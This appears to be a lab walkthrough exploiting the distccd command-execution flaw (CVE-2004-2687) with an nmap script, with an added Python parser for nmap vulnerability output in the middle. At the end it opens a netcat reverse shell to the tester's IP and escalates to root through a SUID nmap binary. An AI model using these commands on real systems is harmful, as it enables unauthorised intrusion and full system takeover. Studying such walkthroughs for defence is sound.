3: 3632 distccd
https://nmap.org/nsedoc/scripts/distcc-cve2004-2687.html
$ nmap -p 3632 10.10.10.3 --script distcc-exec --script-args="distcc-exec.cmd='whoami;id'" -Pn
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-26 16:45 PDT
Nmap scan report for 10.10.10.3
Host is up (0.071s latency).
PORT STATE SERVICE
3632/tcp open distccd
| distcc-exec:
| VULNERABLE:
| distcc Daemon Command Execution
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2004-2687
| Risk factor: High CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
| Allows executing of arbitrary commands on systems running distccd 3.1 and
| earlier. The vulnerability is the consequence of weak service configuration.
|
| Disclosure date: 2002-02-01
| Extra information:
|
| daemon
| uid=1(daemon) gid=1(daemon) groups=1(daemon)
|
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2687
| https://distcc.github.io/security.html
|_ https://nvd.nist.gov/vuln/detail/CVE-2004-2687
Nmap done: 1 IP address (1 host up) scanned in 0.42 seconds
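The scan block above is in the layout the Nmap vulns library prints for any NSE vulnerability script, so it is worth being able to ingest it rather than reading it by eye. The following is an added example (not code from the page, nor from Nmap) that parses that block into a structured finding for vulnerability tracking: port and service, script name, title, state, CVE ids, CVSS score and vector, disclosure date and references. The sample input is constructed to reproduce the output shown above. Field names and the triage threshold are this example's own choices. The remediation the references point to is configuring distccd to accept only trusted client addresses rather than listening to the whole network.

```python
"""Parse Nmap NSE vulnerability output (the vulns-library block layout) into
structured findings.  Added example; not part of the original page."""
import re
from typing import Dict, List, Optional

# Constructed sample reproducing the layout of the distcc-exec scan output above.
SAMPLE_OUTPUT = """\
PORT STATE SERVICE
3632/tcp open distccd
| distcc-exec:
| VULNERABLE:
| distcc Daemon Command Execution
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2004-2687
| Risk factor: High CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
| Allows executing of arbitrary commands on systems running distccd 3.1 and
| earlier. The vulnerability is the consequence of weak service configuration.
|
| Disclosure date: 2002-02-01
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2687
| https://distcc.github.io/security.html
|_ https://nvd.nist.gov/vuln/detail/CVE-2004-2687
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")
SCRIPT_RE = re.compile(r"^([a-z0-9][a-z0-9-]*):$")   # e.g. "distcc-exec:"
CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")
CVSS_RE = re.compile(r"CVSSv2:\s*([0-9.]+)\s*\((\w+)\)\s*\(([^)]+)\)")


def _new_finding(script: str, port: Optional[Dict]) -> Dict:
    return {"script": script, "port": port, "title": None, "state": None,
            "cves": [], "risk": None, "cvss": None, "severity": None,
            "vector": None, "description": [], "disclosure_date": None,
            "references": [], "extra": []}


def parse_nse_vuln(output: str) -> List[Dict]:
    """Walk the scan text line by line; every '<script>:' line under a port
    starts a new finding, and the labelled lines that follow fill it in."""
    findings: List[Dict] = []
    current: Optional[Dict] = None
    port: Optional[Dict] = None
    section: Optional[str] = None
    for raw in output.splitlines():
        m = PORT_RE.match(raw)
        if m:  # "3632/tcp open distccd"
            port = {"port": int(m.group(1)), "proto": m.group(2),
                    "state": m.group(3), "service": m.group(4)}
            continue
        if not raw.startswith("|"):
            continue
        body = raw.lstrip("|_ ").strip()        # drop the "| " / "|_ " gutter
        m = SCRIPT_RE.match(body)
        if m:
            current = _new_finding(m.group(1), port)
            findings.append(current)
            section = None
            continue
        if current is None:
            continue
        if not body:                            # blank "|" ends a free-text run
            section = None
            continue
        if body == "VULNERABLE:":
            section = "title"
        elif section == "title":
            current["title"] = body
            section = None
        elif body.startswith("State:"):
            current["state"] = body[len("State:"):].strip()
        elif body.startswith("IDs:"):
            current["cves"] = CVE_RE.findall(body)
        elif body.startswith("Risk factor:"):
            current["risk"] = body.split("Risk factor:")[1].split("CVSS")[0].strip()
            c = CVSS_RE.search(body)
            if c:
                current["cvss"] = float(c.group(1))
                current["severity"] = c.group(2)
                current["vector"] = c.group(3)
            section = "description"             # prose follows until a blank line
        elif body.startswith("Disclosure date:"):
            current["disclosure_date"] = body.split(":", 1)[1].strip()
            section = None
        elif body.startswith("Extra information:"):
            section = "extra"
        elif body.startswith("References:"):
            section = "references"
        elif section in ("description", "references", "extra"):
            current[section].append(body)
    return findings


def is_exploitable(finding: Dict) -> bool:
    """NSE marks confirmed findings 'VULNERABLE (Exploitable)'; 'LIKELY VULNERABLE'
    is only a version-based guess and should be verified before escalation."""
    return bool(finding["state"]) and "Exploitable" in finding["state"]


def triage(findings: List[Dict], min_cvss: float = 7.0) -> List[str]:
    """One summary line per finding that needs action (threshold is an assumption)."""
    out = []
    for f in findings:
        if is_exploitable(f) or (f["cvss"] is not None and f["cvss"] >= min_cvss):
            p = f["port"] or {}
            out.append(f"{p.get('port')}/{p.get('proto')} {p.get('service')} "
                       f"{f['script']} {','.join(f['cves'])} CVSS={f['cvss']} {f['state']}")
    return out


if __name__ == "__main__":
    for line in triage(parse_nse_vuln(SAMPLE_OUTPUT)):
        print(line)
```

With `nmap -oN`, the same block appears in the normal-output file, so the parser can be pointed at saved scan logs; for anything beyond a handful of hosts the XML output (`-oX`) is the more robust source, since the vulns library also emits its fields as structured XML tables.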
$ nmap -p 3632 10.10.10.3 --script distcc-exec --script-args="distcc-exec.cmd='nc 10.10.14.2 6969 -e /bin/sh'" -Pn
whoami
daemon
find / -type f -user root \( -perm -4000 -o -perm -2000 \) 2>/dev/null -ls
344956 768 -rwsr-xr-x 1 root root 780676 Apr 8 2008 /usr/bin/nmap
nmap --interactive
!sh
whoami;id
root
uid=1(daemon) gid=1(daemon) euid=0(root) groups=1(daemon)